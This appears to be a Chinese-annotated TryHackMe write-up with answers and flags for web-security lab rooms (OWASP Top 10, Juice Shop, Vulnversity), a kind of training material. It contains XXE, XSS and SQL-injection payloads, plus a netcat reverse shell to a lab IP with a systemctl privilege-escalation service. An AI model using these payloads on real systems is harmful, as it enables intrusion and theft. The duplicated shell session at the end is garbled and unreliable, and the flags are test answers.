tryhackme-Application-based Vulnerabilities

2023-10-03 14:09:58

Application-based vulnerabilities

文章目录

Application-based vulnerabilities

Web Fundamentals

task1 Introduction and objectives

1.Read and understand the information

task2 How do we load websites?

1.What request verb is used to retrieve page content?

get

2.What port do web servers normally listen on?

3.What’s responsible for making websites look fancy?

CSS

网页的实际内容通常是HTML、CSS和JavaScript的组合。 HTML 定义页面结构和内容。CSS 允许您更改页面的外观，使其看起来花哨。JavaScript 是一种在浏览器中运行的编程语言，允许您使页面交互或加载额外的内容。

task3 More HTTP - Verbs and request formats

1.What verb would be used for a login?

post

2.What verb would be used to see your bank balance once you’re logged in?

get

3.Does the body of a GET request matter? Yea/Nay

Nay

4.What’s the status code for “I’m a teapot”?

418

IETF在1998年愚人节时发布的一个笑话RFC，具体可以参考RFC 2324 - Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)超文本咖啡壶控制协议。
htcpcp1.0协议中的418的意义是：当客户端给一个茶壶发送泡咖啡的请求时，茶壶就返回一个418错误状态码，表示“我是一个茶壶“

5.What status code will you get if you need to authenticate to access some content, and you’re unauthenticated?

401

task4 Cookies, tasty!

1.Read and try and understand this information. Check out the link for extra information

task5 Mini CTF

1.What’s the GET flag?

thm{162520bec925bd7979e9ae65a725f99f}

curl http://10.10.103.59:8081/ctf/get

2.What’s the POST flag?

thm{3517c902e22def9c6e09b99a9040ba09}

curl -d flag_please http://10.10.103.59:8081/ctf/post

3.What’s the “Get a cookie” flag?

thm{91b1ac2606f36b935f465558213d7ebd}

火狐浏览器访问http://10.10.103.59:8081/ctf/getcookie,查看浏览器cookie

4.What’s the “Set a cookie” flag?

thm{c10b5cb7546f359d19c747db2d0f47b3}

修改domain为10.10.103.59的cookie名/值都为flagpls,访问http://10.10.103.59:8081/ctf/sendcookie;

或者在上一问使用curl -c cookie.txt http://10.10.103.59:8081/ctf/getcookie 获取cookie,修改cookie名/值为flagpls，再使用curl -b cookie.txt http://10.10.103.59:8081/ctf/sendcookie 得到flag

OWASP Top 10

task1 Introduction

Injection
Broken Authentication
Sensitive Data Exposure
XML External Entity
Broken Access Control
Security Misconfiguration
Cross-site Scripting
Insecure Deserialization
Components with Known Vulnerabilities
Insufficent Logging & Monitoring

task2 Accessing machines

Connect to our network or deploy the AttackBox.

task3 [Severity 1] Injection

I’ve understood Injection attacks.

task4 [Severity 1] OS Command Injection

I’ve understood command injection.

task5 [Severity 1] Command Injection Practical

1.What strange text file is in the website root directory?

drpepper.txt

2.How many non-root/non-service/non-daemon users are there?

3.What user is this app running as?

www-data

4.What is the user’s shell set as?

usr/sbin/nologin

5.What version of Ubuntu is running?

18.04.4

6.Print out the MOTD. What favorite beverage is shown?

DR PEPPER

00-header – /etc/update-motd.d/00-header 修改Ubuntu下ssh登录欢迎信息

task6 [Severity 2] Broken Authentication

1.I’ve understood broken authentication mechanisms.

task7 [Severity 2] Broken Authentication Practical

1.What is the flag that you found in darren’s account?

fe86079416a21a3c99937fea8874b667

注册用户时将darren和 darren认定为不同账户，登陆时认定为同一账户造成逻辑漏洞

2.Now try to do the same trick and see if you can login as arthur.

3.What is the flag that you found in arthur’s account?

d9acof7db4fda460ac3edeb75d75e16e

task8 [Severity 3] Sensitive Data Exposure (Introduction)

Read the introduction to Sensitive Data Exposure and deploy the machine.

task9 [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Read and understand the supporting material on SQLite Databases.

task10 [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Read the supporting material about cracking hashes.

task11 [Severity 3] Sensitive Data Exposure (Challenge)

1.What is the name of the mentioned directory?

/assets

2.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db

3.Use the supporting material to access the sensitive data. What is the password hash of the admin user?

6eea9b7ef19179a06954edd0f6c05ceb

4.What is the admin’s plaintext password?

qwertyuiop

md5在线解密破解,md5解密加密

5.Login as the admin. What is the flag?

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

task12 [Severity 4] XML External Entity

Deploy the machine attached to the task.

task13 [Severity 4 XML External Entity - eXtensible Markup Language

1.Full form of XML

eXtensible Markup Language

xml(eXtensible Markup Language)可扩展标记语言

2.Is it compulsory to have XML prolog in XML documents?

3.Can we validate XML documents against a schema?

yes

4.How can we specify XML version and encoding in XML document?

XML Prolog

task14 [Severity 4] XML External Entity - DTD

1.How do you define a new ELEMENT?

!ELEMENT

2.How do you define a ROOT element?

!DOCTYPE

3.How do you define a new ENTITY?

!ENTITY

!ELEMENT定义新的元素；!DOCTYPE定义根元素；!ENTITY定义新的实体

task15 [Severity 4] XML External Entity - XXE Payload

1.Try the payload mentioned in description on the website.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

task16[Severity 4] XML External Entity - Exploiting

1.Try to display your own name using any payload.

2.See if you can read the /etc/passwd

3.What is the name of the user in /etc/passwd

falcon

4.Where is falcon’s SSH key located?

/home/falcon/.ssh/id_rsa

5.What are the first 18 characters for falcon’s private key

MIIEogIBAAKCAQEA7b

task17 [Severity 5] Broken Access Control

Read and understand how broken access control works.

task18[Severity 5] Broken Access Control (IDOR Challenge)

1.Read and understand how IDOR works.

2.Deploy the machine and go to http://MACHINE_IP - Login with the username being noot and the password test1234.

3.Look at other users notes. What is the flag?

flag{fivefourthree}

task19 [Severity 6] Security Misconfiguration

1.Deploy the VM

2.Hack into the webapp, and find the flag!

thm{4b9513968fd564a87b28aa1f9d672e17}

(https://github.com/NinjaJc01/PensiveNotes)

task20 [Severity 7] Cross-site Scripting

1.Deploy the VM

2.Navigate to http://10.10.131.49/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

ThereIsMoreToXSSThanYouThink

3.On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

ReflectiveXss4TheWin

<script>alert(window.location.hostname)</script>

4.Now navigate to http://10.10.131.49/ in your browser and click on the “Stored XSS” tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.

HTML_T4gs

5.On the same page, create an alert popup box appear on the page with your document cookies.

W3LL_D0N3_LVL2

<script>alert(document.cookie)</script>

6.Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

websites_can_be_easily_defaced_with_xss

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

task21 [Severity 8] Insecure Deserialization

1.Who developed the Tomcat application?

Apache Software Foundation

2.What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service

反序列化漏洞会造成Dos（Denial of Service）和远程代码执行RCE (Remote Code Execution)

task22 [Severity 8] Insecure Deserialization - Objects

if a dog was sleeping, would this be:

A) A State
B) A Behaviour

A Behaviour

task23 [Severity 8] Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

binary

task24 [Severity 8] Insecure Deserialization - Cookies

1.If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login

2.What is the acronym for the web technology that Secure cookies work over?

https

secure属性只在https连接发送；http only 不允许js脚本读取cookie

task25 [Severity 8] Insecure Deserialization - Cookies Practical

1.1st flag (cookie value)

THM{good_old_base64_huh}

2.2nd flag (admin dashboard)

THM{heres_the_admin_flag}

task26 [Severity 8] Insecure Deserialization - Code Execution

flag.txt

执行修改后在Github上得到的python脚本，得到base64编码后的反弹shell脚本，写入cookie的encodepayload中发送请求

4a69a7ff9fd68

task27 [Severity 9] Components With Known Vulnerabilities - Intro

Read above.

task28 [Severity 9] Components With Known Vulnerabilities - Exploit

Read the above!

task29 [Severity 9] Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

主页右下方点击Admin Login进入登录界面，万能密码 %’ or ‘1’='1进入后台页面，后台添加书籍信息存在任意文件上传漏洞，上传小马。返回页面，找到新增书籍，反弹shell成功

1611

task30 [Severity 10] Insufficient Logging and Monitoring

1.What IP address is the attacker using?

49.99.13.16

2.What kind of attack is being carried out?

暴力破解Brute Force

task31 What Next?

Read the above!

OWASP Juice Shop

task1 Open for business!

1.Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you’re connected through OpenVPN.

2.Once the machine has loaded, access it by copying and pasting its IP into your browser; if you’re using the browser-based machine, paste the machines IP into a browser on that machine.

task2 Let’s go on an adventure!

1.Question #1: What’s the Administrator’s email address?

The reviews show each user’s email address. Which, by clicking on the Apple Juice product, shows us the Admin email!

admin@juice-sh.op

2.We can now see the search parameter after the /#/search? the letter q

3.If we google “replicator” we will get the results indicating that it is from a TV show called Star Trek

Star Trek

tsak 3 Inject the juice

1.Question #1: Log into the administrator account!

32a5e0f21372bcc1000a6088b93b458e41f0e02a

使用万能密码登录，payload 1’ or ‘1’=‘1’–

2.Question #2: Log into the Bender account!

fb364762a3c102b2db932069c0e6b78e738d4066

同样使用万能密码，payload bender@juice-sh.op’–

task 4 Who broke my lock?!

1.Question #1: Bruteforce the Administrator account’s password!

c2110d06dc6f81c67cd8099ff0ba601241f1ac0e

暴力破解出admin@juice-sh.op账户的密码为admin123

2.Question #2: Reset Jim’s password!

094fbc9b48e525150ba97d05b942bbf114987257

安全问题为兄弟的中间名，上一问jim 与 Star Trek（星际迷航）有关，他的兄弟叫George Samuel Kirk

task 5 AH! Don’t look!

1.Question #1: Access the Confidential Document!

edf9281222395a1c5fee9b89e32175f1ccf50c5b

点击关于我们链接 http://10.10.164.205/ftp/legal.md ，进入ftp目录可以看到很多文件

2.Question #2: Log into MC SafeSearch’s account!

搜索MC SafeSearch，油管上有相关视频可得知他的密码为 "Mr. Noodles"但 "vowels into zeros"将元音字母变成0，密码为 Mr.N00dles

3.Question #3: Download the Backup file!

在ftp目录下载pack只允许age.json.bak文件报错只允许下载md和pdf文件，使用%00截断下载文件

task6 Who’s flying this thing?

1.Question #1: Access the administration page!

946a799363226a24822008503f5d1324536629a0

直接访问管理后台报错403，需要登录管理员账号才能访问

2.Question #2: View another user’s shopping basket!

41b997a36cc33fbe4f0ba018474e19ae5ce52121

burp截取访问购物车URLhttp://10.10.164.205/rest/basket/1，1代表用户ID，修改为其他用户ID即可平行越权访问

3.Question #3: Remove all 5-star reviews!

50c97bcce0b895e446d61c83a21df371ac2266ef

登录后台页面，删除右侧5星评论即可

task 7 Where did that come from?

1.Question #1: Perform a DOM XSS!

9aaf4bbea5c30d00a1f5bbcfce4db6d4b0efe0bf

<iframe src="javascript:alert(xss)">搜索框输入payload即可

2.Question #2: Perform a persistent XSS!

149aa8ce13d7a4a8a931472308e269c94dc5f156

对URL True-Client-IP没有做过滤

3.Question #3: Perform a reflected XSS!

23cefee1527bde039295b2616eeb29e1edc660a0

URLhttp://10.10.164.205/#/track-result?id=5267-d156f507ae884e75的参数id没有做过滤直接显示在页面上，id参数换成payload请求弹窗(建议使用firefox)

task 8 Exploration!

Access the /#/score-board/ page

7efd3174f9dd5baa03a7882027f2824d2f72d86e

/score-board 计分板页面

参考：靶场Juice-Shop学习

Vulnversity ⭐️反弹shell ⭐️systemctl提权

task1 Deploy the machine

无需回答

task2 Reconnaissance

1.There are many nmap “cheatsheets” online that you can use too.

无需回答

2.Scan the box, how many ports are open?

3.What version of the squid proxy is running on the machine?

3.5.12

4.How many ports will nmap scan if the flag -p-400 was used?

400

5.Using the nmap flag -n what will it not resolve?

DNS

-n 禁用DNS反向解析

6.What is the most likely operating system this machine is running?

Ubuntu

7.What port is the web server running on?

3333

task3 Locating directories using GoBuster

1.What is the directory that has an upload form page?

/internal/

task4 Compromise the webserver

1.Try upload a few file types to the server, what common extension seems to be blocked?

.php

2.Run this attack, what extension is allowed?

.phtml

3.What is the name of the user who manages the webserver?

bill

4.What is the user flag?

task5 Privilege Escalation

1.On the system, search for all SUID files. What file stands out?

/bin/systemctl

find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件

/bin/systemctl 文件具备suid位可以用来提权

2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh
www-data@vulnuniversity:/tmp$ TF=$(mktemp).service
www-data@vulnuniversity:/tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "bash /tmp/shell.sh"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.

提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本

参考链接:Tryhackme - Vulnversity

p$ TF=$(mktemp).service

www-data@vulnuniversity:/tmp$ echo '[Service]

Type=oneshot
ExecStart=/bin/sh -c “bash /tmp/shell.sh”
[Install]
WantedBy=multi-user.target’ > T F w w w − d a t a @ v u l n u n i v e r s i t y : / t m p TF www-data@vulnuniversity:/tmp TFwww−data@vulnuniversity:/tmp /bin/systemctl link T F C r e a t e d s y m l i n k f r o m / e t c / s y s t e m d / s y s t e m / t m p . C H T u v f k a o z . s e r v i c e t o / t m p / t m p . C H T u v f k a o z . s e r v i c e . w w w − d a t a @ v u l n u n i v e r s i t y : / t m p TF Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service. www-data@vulnuniversity:/tmp TFCreatedsymlinkfrom/etc/systemd/system/tmp.CHTuvfkaoz.serviceto/tmp/tmp.CHTuvfkaoz.service.www−data@vulnuniversity:/tmp /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本